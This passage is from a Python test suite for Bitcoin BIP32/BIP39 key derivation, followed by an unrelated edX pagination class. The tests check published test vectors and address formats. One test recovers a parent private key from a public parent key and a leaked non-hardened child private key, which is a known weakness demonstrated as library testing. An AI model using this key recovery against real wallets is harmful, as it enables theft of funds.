self.assertEqual(xprv, b"xprv9s21ZrQH143K31xYSDQpPDxsXRTUcvj2iNHm5NUtrGiGG5e2DtALGdso3pGz6ssrdK4PFmM8NSpSBHNqPqm55Qn3LqFtT2emdEXVYsCzC2U")
xpub = derive(xpub, ".") # public relative
self.assertEqual(xpub, b"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB")
xpub = derive(rootxpub, "m") # public absolute
self.assertEqual(xpub, b"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub661MyMwAqRbcFW31YEwpkMuc5THy2PSt5bDMsktWQcFF8syAmRUapSCGu8ED9W6oDMSgv6Zz8idoc4a6mr8BDzTJY47LJhkJ8UB7WEGuduB")
xprv = derive(xprv, "./0") # private relative
self.assertEqual(xprv, b"xprv9vHkqa6EV4sPZHYqZznhT2NPtPCjKuDKGY38FBWLvgaDx45zo9WQRUT3dKYnjwih2yJD9mkrocEZXo1ex8G81dwSM1fwqWpWkeS3v86pgKt")
xprv = derive(rootxprv, "m/0") # private absolute
self.assertEqual(xprv, b"xprv9vHkqa6EV4sPZHYqZznhT2NPtPCjKuDKGY38FBWLvgaDx45zo9WQRUT3dKYnjwih2yJD9mkrocEZXo1ex8G81dwSM1fwqWpWkeS3v86pgKt")
xpub = derive(xpub, "./0") # public relative
self.assertEqual(xpub, b"xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH")
xpub = derive(rootxpub, "m/0") # public absolute
self.assertEqual(xpub, b"xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub69H7F5d8KSRgmmdJg2KhpAK8SR3DjMwAdkxj3ZuxV27CprR9LgpeyGmXUbC6wb7ERfvrnKZjXoUmmDznezpbZb7ap6r1D3tgFxHmwMkQTPH")
xprv = derive(xprv, "./2147483647H") # private relative
self.assertEqual(xprv, b"xprv9wSp6B7kry3Vj9m1zSnLvN3xH8RdsPP1Mh7fAaR7aRLcQMKTR2vidYEeEg2mUCTAwCd6vnxVrcjfy2kRgVsFawNzmjuHc2YmYRmagcEPdU9")
xprv = derive(rootxprv, "m/0/2147483647H") # private absolute
self.assertEqual(xprv, b"xprv9wSp6B7kry3Vj9m1zSnLvN3xH8RdsPP1Mh7fAaR7aRLcQMKTR2vidYEeEg2mUCTAwCd6vnxVrcjfy2kRgVsFawNzmjuHc2YmYRmagcEPdU9")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub6ASAVgeehLbnwdqV6UKMHVzgqAG8Gr6riv3Fxxpj8ksbH9ebxaEyBLZ85ySDhKiLDBrQSARLq1uNRts8RuJiHjaDMBU4Zn9h8LZNnBC5y4a")
xprv = derive(xprv, "./1") # private relative
self.assertEqual(xprv, b"xprv9zFnWC6h2cLgpmSA46vutJzBcfJ8yaJGg8cX1e5StJh45BBciYTRXSd25UEPVuesF9yog62tGAQtHjXajPPdbRCHuWS6T8XA2ECKADdw4Ef")
xprv = derive(rootxprv, "m/0/2147483647H/1") # private absolute
self.assertEqual(xprv, b"xprv9zFnWC6h2cLgpmSA46vutJzBcfJ8yaJGg8cX1e5StJh45BBciYTRXSd25UEPVuesF9yog62tGAQtHjXajPPdbRCHuWS6T8XA2ECKADdw4Ef")
xpub = derive(xpub, "./1") # public relative
self.assertEqual(xpub, b"xpub6DF8uhdarytz3FWdA8TvFSvvAh8dP3283MY7p2V4SeE2wyWmG5mg5EwVvmdMVCQcoNJxGoWaU9DCWh89LojfZ537wTfunKau47EL2dhHKon")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub6DF8uhdarytz3FWdA8TvFSvvAh8dP3283MY7p2V4SeE2wyWmG5mg5EwVvmdMVCQcoNJxGoWaU9DCWh89LojfZ537wTfunKau47EL2dhHKon")
xprv = derive(xprv, "./2147483646H") # private relative
self.assertEqual(xprv, b"xprvA1RpRA33e1JQ7ifknakTFpgNXPmW2YvmhqLQYMmrj4xJXXWYpDPS3xz7iAxn8L39njGVyuoseXzU6rcxFLJ8HFsTjSyQbLYnMpCqE2VbFWc")
# private absolute
xprv = derive(rootxprv, "m/0/2147483647H/1/2147483646H")
self.assertEqual(xprv, b"xprvA1RpRA33e1JQ7ifknakTFpgNXPmW2YvmhqLQYMmrj4xJXXWYpDPS3xz7iAxn8L39njGVyuoseXzU6rcxFLJ8HFsTjSyQbLYnMpCqE2VbFWc")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub6ERApfZwUNrhLCkDtcHTcxd75RbzS1ed54G1LkBUHQVHQKqhMkhgbmJbZRkrgZw4koxb5JaHWkY4ALHY2grBGRjaDMzQLcgJvLJuZZvRcEL")
xprv = derive(xprv, "./2") # private relative
self.assertEqual(xprv, b"xprvA2nrNbFZABcdryreWet9Ea4LvTJcGsqrMzxHx98MMrotbir7yrKCEXw7nadnHM8Dq38EGfSh6dqA9QWTyefMLEcBYJUuekgW4BYPJcr9E7j")
# private absolute
xprv = derive(rootxprv, "m/0/2147483647H/1/2147483646H/2")
self.assertEqual(xprv, b"xprvA2nrNbFZABcdryreWet9Ea4LvTJcGsqrMzxHx98MMrotbir7yrKCEXw7nadnHM8Dq38EGfSh6dqA9QWTyefMLEcBYJUuekgW4BYPJcr9E7j")
xpub = derive(xpub, "./2") # public relative
self.assertEqual(xpub, b"xpub6FnCn6nSzZAw5Tw7cgR9bi15UV96gLZhjDstkXXxvCLsUXBGXPdSnLFbdpq8p9HmGsApME5hQTZ3emM2rnY5agb9rXpVGyy3bdW6EEgAtqt")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub6FnCn6nSzZAw5Tw7cgR9bi15UV96gLZhjDstkXXxvCLsUXBGXPdSnLFbdpq8p9HmGsApME5hQTZ3emM2rnY5agb9rXpVGyy3bdW6EEgAtqt")
def test_vector3(self):
"""BIP32 test vector 3
https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki
"""
xkey_version = _PRV_VERSIONS[0]
seed = "4b381541583be4423346c643850da4b320e46a87ae3d2a4e6da11eba819cd4acba45d239319ac14f863b8d5ab5a0d0c64d2e8a1e7d1457df2e5a3c51c73235be"
rootxprv = rootxprv_from_seed(seed, xkey_version)
self.assertEqual(rootxprv, b"xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6")
rootxpub = xpub_from_xprv(rootxprv) # neutering
self.assertEqual(rootxpub, b"xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13")
xprv = rootxprv
xpub = rootxpub
xprv = derive(xprv, ".") # private relative
self.assertEqual(xprv, b"xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6")
xprv = derive(rootxprv, "m") # private absolute
self.assertEqual(xprv, b"xprv9s21ZrQH143K25QhxbucbDDuQ4naNntJRi4KUfWT7xo4EKsHt2QJDu7KXp1A3u7Bi1j8ph3EGsZ9Xvz9dGuVrtHHs7pXeTzjuxBrCmmhgC6")
xpub = derive(xpub, ".") # public relative
self.assertEqual(xpub, b"xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13")
xpub = derive(rootxpub, "m") # public absolute
self.assertEqual(xpub, b"xpub661MyMwAqRbcEZVB4dScxMAdx6d4nFc9nvyvH3v4gJL378CSRZiYmhRoP7mBy6gSPSCYk6SzXPTf3ND1cZAceL7SfJ1Z3GC8vBgp2epUt13")
xprv = derive(xprv, "./0'") # private relative
self.assertEqual(xprv, b"xprv9uPDJpEQgRQfDcW7BkF7eTya6RPxXeJCqCJGHuCJ4GiRVLzkTXBAJMu2qaMWPrS7AANYqdq6vcBcBUdJCVVFceUvJFjaPdGZ2y9WACViL4L")
xprv = derive(rootxprv, "m/0'") # private absolute
self.assertEqual(xprv, b"xprv9uPDJpEQgRQfDcW7BkF7eTya6RPxXeJCqCJGHuCJ4GiRVLzkTXBAJMu2qaMWPrS7AANYqdq6vcBcBUdJCVVFceUvJFjaPdGZ2y9WACViL4L")
xpub = xpub_from_xprv(xprv) # neutering
self.assertEqual(xpub, b"xpub68NZiKmJWnxxS6aaHmn81bvJeTESw724CRDs6HbuccFQN9Ku14VQrADWgqbhhTHBaohPX4CjNLf9fq9MYo6oDaPPLPxSb7gwQN3ih19Zm4Y")
def test_bip39_vectors(self):
"""BIP32 test vectors from BIP39
https://github.com/bitcoin/bips/blob/master/bip-0039.mediawiki
"""
file = "bip39_test_vectors.json"
filename = path.join(path.dirname(__file__), "data", file)
with open(filename, 'r') as f:
test_vectors = json.load(f)["english"]
f.closed
xkey_version = _PRV_VERSIONS[0]
for test_vector in test_vectors:
seed = test_vector[2]
rootxprv = rootxprv_from_seed(seed, xkey_version)
self.assertEqual(rootxprv, test_vector[3].encode('ascii'))
def test_mainnet(self):
# bitcoin core derivation style
rootxprv = b'xprv9s21ZrQH143K2ZP8tyNiUtgoezZosUkw9hhir2JFzDhcUWKz8qFYk3cxdgSFoCMzt8E2Ubi1nXw71TLhwgCfzqFHfM5Snv4zboSebePRmLS'
# m/0'/0'/463'
addr1 = b'1DyfBWxhVLmrJ7keyiHeMbt7N3UdeGU4G5'
indexes = [0x80000000, 0x80000000, 0x800001cf]
addr = p2pkh_from_xpub(xpub_from_xprv(derive(rootxprv, indexes)))
self.assertEqual(addr, addr1)
path = "m/0'/0'/463'"
addr = p2pkh_from_xpub(xpub_from_xprv(derive(rootxprv, path)))
self.assertEqual(addr, addr1)
# m/0'/0'/267'
addr2 = b'11x2mn59Qy43DjisZWQGRResjyQmgthki'
indexes = [0x80000000, 0x80000000, 0x8000010b]
addr = p2pkh_from_xpub(xpub_from_xprv(derive(rootxprv, indexes)))
self.assertEqual(addr, addr2)
path = "m/0'/0'/267'"
addr = p2pkh_from_xpub(xpub_from_xprv(derive(rootxprv, path)))
self.assertEqual(addr, addr2)
xkey_version = _PRV_VERSIONS[0]
seed = "bfc4cbaad0ff131aa97fa30a48d09ae7df914bcc083af1e07793cd0a7c61a03f65d622848209ad3366a419f4718a80ec9037df107d8d12c19b83202de00a40ad"
seed = bytes.fromhex(seed)
xprv = rootxprv_from_seed(seed, xkey_version)
xpub = b'xpub661MyMwAqRbcFMYjmw8C6dJV97a4oLss6hb3v9wTQn2X48msQB61RCaLGtNhzgPCWPaJu7SvuB9EBSFCL43kTaFJC3owdaMka85uS154cEh'
self.assertEqual(xpub_from_xprv(xprv), xpub)
ind = './0/0'
addr = p2pkh_from_xpub(xpub_from_xprv(derive(xprv, ind)))
self.assertEqual(addr, b'1FcfDbWwGs1PmyhMVpCAhoTfMnmSuptH6g')
ind = './0/1'
addr = p2pkh_from_xpub(xpub_from_xprv(derive(xprv, ind)))
self.assertEqual(addr, b'1K5GjYkZnPFvMDTGaQHTrVnd8wjmrtfR5x')
ind = './0/2'
addr = p2pkh_from_xpub(xpub_from_xprv(derive(xprv, ind)))
self.assertEqual(addr, b'1PQYX2uN7NYFd7Hq22ECMzfDcKhtrHmkfi')
ind = './1/0'
addr = p2pkh_from_xpub(xpub_from_xprv(derive(xprv, ind)))
self.assertEqual(addr, b'1BvSYpojWoWUeaMLnzbkK55v42DbizCoyq')
ind = './1/1'
addr = p2pkh_from_xpub(xpub_from_xprv(derive(xprv, ind)))
self.assertEqual(addr, b'1NXB59hF4QzYpFrB7o6usLBjbk2D3ZqxAL')
ind = './1/2'
addr = p2pkh_from_xpub(xpub_from_xprv(derive(xprv, ind)))
self.assertEqual(addr, b'16NLYkKtvYhW1Jp86tbocku3gxWcvitY1w')
# version/key mismatch in extended parent key
temp = b58decode(rootxprv)
bad_xprv = b58encode(temp[0:45] + b'\x01' + temp[46:])
self.assertRaises(ValueError, derive, bad_xprv, 1)
#derive(bad_xprv, 1)
# version/key mismatch in extended parent key
xpub = xpub_from_xprv(rootxprv)
temp = b58decode(xpub)
bad_xpub = b58encode(temp[0:45] + b'\x00' + temp[46:])
self.assertRaises(ValueError, derive, bad_xpub, 1)
#derive(bad_xpub, 1)
# no private/hardened derivation from pubkey
self.assertRaises(ValueError, derive, xpub, 0x80000000)
#derive(xpub, 0x80000000)
def test_testnet(self):
# bitcoin core derivation style
rootxprv = b'tprv8ZgxMBicQKsPe3g3HwF9xxTLiyc5tNyEtjhBBAk29YA3MTQUqULrmg7aj9qTKNfieuu2HryQ6tGVHse9x7ANFGs3f4HgypMc5nSSoxwf7TK'
# m/0'/0'/51'
addr1 = b'mfXYCCsvWPgeCv8ZYGqcubpNLYy5nYHbbj'
indexes = [0x80000000, 0x80000000, 0x80000000 + 51]
addr = p2pkh_from_xpub(
xpub_from_xprv(derive(rootxprv, indexes)))
self.assertEqual(addr, addr1)
path = "m/0'/0'/51'"
addr = p2pkh_from_xpub(
xpub_from_xprv(derive(rootxprv, path)))
self.assertEqual(addr, addr1)
# m/0'/1'/150'
addr2 = b'mfaUnRFxVvf55uD1P3zWXpprN1EJcKcGrb'
indexes = [0x80000000, 0x80000000 + 1, 0x80000000 + 150]
addr = p2pkh_from_xpub(
xpub_from_xprv(derive(rootxprv, indexes)))
self.assertEqual(addr, addr2)
path = "m/0'/1'/150'"
addr = p2pkh_from_xpub(
xpub_from_xprv(derive(rootxprv, path)))
self.assertEqual(addr, addr2)
def test_exceptions(self):
# valid xprv
xprv = b'xprv9s21ZrQH143K2oxHiQ5f7D7WYgXD9h6HAXDBuMoozDGGiYHWsq7TLBj2yvGuHTLSPCaFmUyN1v3fJRiY2A4YuNSrqQMPVLZKt76goL6LP7L'
# invalid index
self.assertRaises(ValueError, derive, xprv, 'invalid index')
#derive(xprv, 'invalid index')
# a 4 bytes int is required, not 3
self.assertRaises(ValueError, derive, xprv, "800000")
#derive(xprv, "800000")
# Invalid derivation path root: ""
self.assertRaises(ValueError, derive, xprv, '/1')
#derive(xprv, '/1')
# invalid checksum
xprv = b'xppp9s21ZrQH143K2oxHiQ5f7D7WYgXD9h6HAXDBuMoozDGGiYHWsq7TLBj2yvGuHTLSPCaFmUyN1v3fJRiY2A4YuNSrqQMPVLZKt76goL6LP7L'
self.assertRaises(ValueError, derive, xprv, 0x80000000)
#derive(xprv, 0x80000000)
# invalid extended key version
version = b'\x04\x88\xAD\xE5'
xkey = version + b'\x00'*74
xkey = b58encode(xkey)
self.assertRaises(ValueError, derive, xkey, 0x80000000)
#derive(xkey, 0x80000000)
# unknown extended key version
version = b'\x04\x88\xAD\xE5'
seed = "5b56c417303faa3fcba7e57400e120a0ca83ec5a4fc9ffba757fbe63fbd77a89a1a3be4c67196f57c39a88b76373733891bfaba16ed27a813ceed498804c0570"
self.assertRaises(ValueError, rootxprv_from_seed, seed, version)
#rootxprv_from_seed(seed, version)
# extended key is not a private one
xpub = b'xpub6H1LXWLaKsWFhvm6RVpEL9P4KfRZSW7abD2ttkWP3SSQvnyA8FSVqNTEcYFgJS2UaFcxupHiYkro49S8yGasTvXEYBVPamhGW6cFJodrTHy'
self.assertRaises(ValueError, xpub_from_xprv, xpub)
# xpub_from_xprv(xpub)
# Absolute derivation path for non-master key
self.assertRaises(ValueError, derive, xpub, "m/44'/0'/1'/0/10")
#derive(xpub, "m/0/1")
# empty derivation path
self.assertRaises(ValueError, derive, xpub, "")
#derive(xpub, "")
# extended key is not a public one
self.assertRaises(ValueError, p2pkh_from_xpub, xprv)
# p2pkh_from_xpub(xprv)
# xkey is not a public one
xprv = b'xprv9s21ZrQH143K2ZP8tyNiUtgoezZosUkw9hhir2JFzDhcUWKz8qFYk3cxdgSFoCMzt8E2Ubi1nXw71TLhwgCfzqFHfM5Snv4zboSebePRmLS'
self.assertRaises(ValueError, slip32.address_from_xpub, xprv)
# slip32.address_from_xpub(xprv)
self.assertRaises(ValueError, p2wpkh_from_xpub, xprv)
# p2wpkh_from_xpub(xprv)
self.assertRaises(
ValueError, p2wpkh_p2sh_from_xpub, xprv)
# p2wpkh_p2sh_from_xpub(xprv)
def test_exceptions2(self):
rootxprv = b'xprv9s21ZrQH143K2ZP8tyNiUtgoezZosUkw9hhir2JFzDhcUWKz8qFYk3cxdgSFoCMzt8E2Ubi1nXw71TLhwgCfzqFHfM5Snv4zboSebePRmLS'
d = deserialize(rootxprv)
self.assertEqual(serialize(d), rootxprv)
# invalid 34-bytes key length
d['key'] += b'\x00'
self.assertRaises(ValueError, serialize, d)
#serialize(d)
# invalid 33-bytes chain_code length
d = deserialize(rootxprv)
d['chain_code'] += b'\x00'
self.assertRaises(ValueError, serialize, d)
#serialize(d)
# invalid 5-bytes parent_fingerprint length
d = deserialize(rootxprv)
d['parent_fingerprint'] += b'\x00'
self.assertRaises(ValueError, serialize, d)
#serialize(d)
# invalid 5-bytes index length
d = deserialize(rootxprv)
d['index'] += b'\x00'
self.assertRaises(ValueError, serialize, d)
#serialize(d)
# invalid depth (256)
d = deserialize(rootxprv)
d['depth'] = 256
self.assertRaises(ValueError, serialize, d)
#serialize(d)
# zero depth with non-zero index b'\x00\x00\x00\x01'
d = deserialize(rootxprv)
d['index'] = b'\x00\x00\x00\x01'
self.assertRaises(ValueError, serialize, d)
#serialize(d)
# zero depth with non-zero parent_fingerprint b'\x00\x00\x00\x01'
d = deserialize(rootxprv)
d['parent_fingerprint'] = b'\x00\x00\x00\x01'
self.assertRaises(ValueError, serialize, d)
#serialize(d)
# non-zero depth (1) with zero parent_fingerprint b'\x00\x00\x00\x00'
xprv = deserialize(derive(rootxprv, 1))
xprv['parent_fingerprint'] = b'\x00\x00\x00\x00'
self.assertRaises(ValueError, serialize, xprv)
#serialize(xprv)
# int too big to convert
self.assertRaises(OverflowError, derive, rootxprv, 256**4)
# Index must be 4-bytes, not 5
self.assertRaises(ValueError, derive, rootxprv, b'\x00'*5)
#derive(rootxprv, b'\x00'*5)
def test_testnet_versions(self):
# data cross-checked with Electrum and https://jlopp.github.io/xpub-converter/
# 128 bits
raw_entr = bytes.fromhex('6'*32)
# 12 words
mnemonic = bip39.mnemonic_from_entropy(raw_entr, 'en')
seed = bip39.seed_from_mnemonic(mnemonic, '')
# p2pkh BIP44
# m / 44' / coin_type' / account' / change / address_index
path = "m/44h/1h/0h"
version = TEST_tprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'tpubDChqWo2Xi2wNsxyJBE8ipcTJHLKWcqeeNUKBVTpUCNPZkHzHTm3qKAeHqgCou1t8PAY5ZnJ9QDa6zXSZxmjDnhiBpgZ7f6Yv88wEm5HXVbm'
self.assertEqual(xpub, exp)
# first addresses
xpub_ext = derive(xpub, "./0/0") # external
address = p2pkh_from_xpub(xpub_ext)
exp_address = b'moutHSzeFWViMNEcvBxKzNCMj2kca8MvE1'
self.assertEqual(address, exp_address)
xpub_int = derive(xpub, "./1/0") # internal
address = p2pkh_from_xpub(xpub_int)
exp_address = b'myWcXdNais9ExumnGKnNoJwoihQKfNPG9i'
self.assertEqual(address, exp_address)
# legacy segwit (p2wpkh-p2sh)
# m / 49'/ coin_type' / account' / change / address_index
path = "m/49h/1h/0h"
version = TEST_uprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'upub5Dj8j7YrwodV68mt58QmNpSzjqjso2WMXEpLGLSvskKccGuXhCh3dTedkzVLAePA617UyXAg2vdswJXTYjU4qjMJaHU79GJVVJCAiy9ezZ2'
self.assertEqual(xpub, exp)
# first addresses
xpub_ext = derive(xpub, "./0/0") # external
address = p2wpkh_p2sh_from_xpub(xpub_ext)
exp_address = b'2Mw8tQ6uT6mHhybarVhjgomUhHQJTeV9A2c'
self.assertEqual(address, exp_address)
xpub_int = derive(xpub, "./1/0") # internal
address = p2wpkh_p2sh_from_xpub(xpub_int)
exp_address = b'2N872CRJ3E1CzWjfixXr3aeC3hkF5Cz4kWb'
self.assertEqual(address, exp_address)
# legacy segwit (p2wsh-p2sh)
# m / 49'/ coin_type' / account' / change / address_index
path = "m/49h/1h/0h"
version = TEST_Uprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'Upub5QdDrMHJWmBrWhwG1nskCtnoTdn91PBwqWU1BbiUFXA2ETUSTc5KiaWZZhSoj5c4KUBTr7Anv92P4U9Dqxd1zDTyQkaWYfmVP2U3Js1W5cG'
self.assertEqual(xpub, exp)
# native segwit (p2wpkh)
# m / 84'/ coin_type' / account' / change / address_index
path = "m/84h/1h/0h"
version = TEST_vprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'vpub5ZhJmduYY7M5J2qCJgSW7hunX6zJrr5WuNg2kKt321HseZEYxqJc6Zso47aNXQw3Wf3sA8kppbfsxnLheUNXcL3xhzeBHLNp8fTVBN6DnJF'
self.assertEqual(xpub, exp)
# first addresses
xpub_ext = derive(xpub, "./0/0") # external
address = p2wpkh_from_xpub(xpub_ext)
# this is regtest, not testnet!!
exp_address = b'bcrt1qv8lcnmj09rpdqwgl025h2deygur64z4hqf7me5'
# FIXME: self.assertEqual(address, exp_address)
xpub_int = derive(xpub, "./1/0") # internal
address = p2wpkh_from_xpub(xpub_int)
# this is regtest, not testnet!!
exp_address = b'bcrt1qqhxvky4y6qkwpvdzqjkdafmj20vs5trmt6y8w5'
# FIXME: self.assertEqual(address, exp_address)
# native segwit (p2wsh)
# m / 84'/ coin_type' / account' / change / address_index
path = "m/84h/1h/0h"
version = TEST_Vprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'Vpub5kbPtsdz74uSibzaFLuUwnFbEu2a5Cm7DeKhfb9aPn8HGjoTjEgtBgjirpXr5r9wk87r2ikwhp4P5wxTwhXUkpAdYTkagjqp2PjMmGPBESU'
self.assertEqual(xpub, exp)
def test_mainnet_versions(self):
# data cross-checked with Electrum and https://jlopp.github.io/xpub-converter/
# 128 bits
raw_entr = bytes.fromhex('6'*32)
# 12 words
mnemonic = bip39.mnemonic_from_entropy(raw_entr, 'en')
seed = bip39.seed_from_mnemonic(mnemonic, '')
# p2pkh BIP44
# m / 44' / coin_type' / account' / change / address_index
path = "m/44h/0h/0h"
version = MAIN_xprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'xpub6C3uWu5Go5q62JzJpbjyCLYRGLYvexFeiepZTsYZ6SRexARkNfjG7GKtQVuGR3KHsyKsAwv7Hz3iNucPp6pfHiLvBczyK1j5CtBtpHB3NKx'
self.assertEqual(xpub, exp)
# first addresses
xpub_ext = derive(xpub, "./0/0") # external
address = p2pkh_from_xpub(xpub_ext)
exp_address = b'1DDKKVHoFWGfctyEEJvrusqq6ipEaieGCq'
self.assertEqual(address, exp_address)
xpub_int = derive(xpub, "./1/0") # internal
address = p2pkh_from_xpub(xpub_int)
exp_address = b'1FhKoffreKHzhtBMVW9NSsg3ZF148JPGoR'
self.assertEqual(address, exp_address)
# legacy segwit (p2wpkh-p2sh)
# m / 49'/ coin_type' / account' / change / address_index
path = "m/49h/0h/0h"
version = MAIN_yprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'ypub6YBGdYufCVeoPVmNXfdrWhaBCXsQoLKNetNmD9bPTrKmnKVmiyU8f1uJqwGdmBb8kbAZpHoYfXQTLbWpkXc4skQDAreeCUXdbX9k8vtiHsN'
self.assertEqual(xpub, exp)
# first addresses
xpub_ext = derive(xpub, "./0/0") # external
address = p2wpkh_p2sh_from_xpub(xpub_ext)
exp_address = b'3FmNAiTCWe5kPMgc4dtSgEdY8VuaCiJEH8'
self.assertEqual(address, exp_address)
xpub_int = derive(xpub, "./1/0") # internal
address = p2wpkh_p2sh_from_xpub(xpub_int)
exp_address = b'34FLgkoRYX5Q5fqiZCZDwsK5GpXxmFuLJN'
self.assertEqual(address, exp_address)
# legacy segwit (p2wsh-p2sh)
# m / 49'/ coin_type' / account' / change / address_index
path = "m/49h/0h/0h"
version = MAIN_Yprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'Ypub6j5Mkne6mTDAp4vkUL6qLmuyvKug1gzxyA2S8QrvqdABQW4gVNrQk8mEeeE7Kcp2z4EYgsofYjnxTm8b3km22EWt1Km3bszdVFRcipc6rXu'
self.assertEqual(xpub, exp)
# native segwit (p2wpkh)
# m / 84'/ coin_type' / account' / change / address_index
path = "m/84h/0h/0h"
version = MAIN_zprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'zpub6qg3Uc1BAQkQvcBUYMmZHSzbsshSon3FvJ8yvH3ZZMjFNvJkwSji8UUwghiF3wvpvSvcNWVP8kfUhc2V2RwGp6pTC3ouj6njj956f26TniN'
self.assertEqual(xpub, exp)
# first addresses
xpub_ext = derive(xpub, "./0/0") # external
address = p2wpkh_from_xpub(xpub_ext)
exp_address = b'bc1q0hy024867ednvuhy9en4dggflt5w9unw4ztl5a'
self.assertEqual(address, exp_address)
xpub_int = derive(xpub, "./1/0") # internal
address = p2wpkh_from_xpub(xpub_int)
exp_address = b'bc1qy4x03jyl88h2zeg7l287xhv2xrwk4c3ztfpjd2'
self.assertEqual(address, exp_address)
# native segwit (p2wsh)
# m / 84'/ coin_type' / account' / change / address_index
path = "m/84h/0h/0h"
version = MAIN_Zprv
rootprv = rootxprv_from_seed(seed, version)
xprv = derive(rootprv, path)
xpub = xpub_from_xprv(xprv)
exp = b'Zpub72a8bqjcjNJnMBLrV2EY7XLQbfji28irEZneqYK6w8Zf16sfhr7zDbLsVQficP9j9uzbF6VW1y3ypmeFKf6Dxaw82WvK8WFjcsLyEvMNZjF'
self.assertEqual(xpub, exp)
def test_rootxprv_from_mnemonic(self):
mnemonic = "abandon abandon atom trust ankle walnut oil across awake bunker divorce abstract"
passphrase = ''
rootxprv = rootxprv_from_bip39mnemonic(mnemonic, passphrase, _PRV_VERSIONS[0])
exp = b'xprv9s21ZrQH143K3ZxBCax3Wu25iWt3yQJjdekBuGrVa5LDAvbLeCT99U59szPSFdnMe5szsWHbFyo8g5nAFowWJnwe8r6DiecBXTVGHG124G1'
self.assertEqual(rootxprv, exp)
def test_crack(self):
parent_xpub = b'xpub6BabMgRo8rKHfpAb8waRM5vj2AneD4kDMsJhm7jpBDHSJvrFAjHJHU5hM43YgsuJVUVHWacAcTsgnyRptfMdMP8b28LYfqGocGdKCFjhQMV'
child_xprv = b'xprv9xkG88dGyiurKbVbPH1kjdYrA8poBBBXa53RKuRGJXyruuoJUDd8e4m6poiz7rV8Z4NoM5AJNcPHN6aj8wRFt5CWvF8VPfQCrDUcLU5tcTm'
parent_xprv = crack_prvkey(parent_xpub, child_xprv)
self.assertEqual(xpub_from_xprv(parent_xprv), parent_xpub)
# same check with XKeyDict
parent_xprv = crack_prvkey(deserialize(parent_xpub), deserialize(child_xprv))
self.assertEqual(xpub_from_xprv(parent_xprv), parent_xpub)
# extended parent key is not a public one
self.assertRaises(ValueError, crack_prvkey, parent_xprv, child_xprv)
#crack_prvkey(parent_xprv, child_xprv)
# extended child key is not a private one
self.assertRaises(ValueError, crack_prvkey, parent_xpub, parent_xpub)
#crack_prvkey(parent_xpub, parent_xpub)
# wrong child/parent depth relation
child_xpub = xpub_from_xprv(child_xprv)
self.assertRaises(ValueError, crack_prvkey, child_xpub, child_xprv)
#crack_prvkey(child_xpub, child_xprv)
# not a child for the provided parent
child0_xprv = derive(parent_xprv, 0)
grandchild_xprv = derive(child0_xprv, 0)
self.assertRaises(ValueError, crack_prvkey, child_xpub, grandchild_xprv)
#crack_prvkey(child_xpub, grandchild_xprv)
# hardened derivation
hardened_child_xprv = derive(parent_xprv, 0x80000000)
self.assertRaises(ValueError, crack_prvkey,
parent_xpub, hardened_child_xprv)
#crack_prvkey(parent_xpub, hardened_child_xprv)
if __name__ == "__main__":
# execute only if run as a script
unittest.main()
|
""" CCX API v0 Paginators. """
from edx_rest_framework_extensions.paginators import DefaultPagination
class CCXAPIPagination(DefaultPagination):
"""
Pagination format used by the CCX API.
"""
page_size_query_param = "page_size"
def get_paginated_response(self, data):
"""
Annotate the response with pagination information.
"""
response = super().get_paginated_response(data)
# Add the current page to the response.
response.data["current_page"] = self.page.number
# This field can be derived from other fields in the response,
# so it may make sense to have the JavaScript client calculate it
# instead of including it in the response.
response.data["start"] = (self.page.number - 1) * self.get_page_size(self.request)
return response
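
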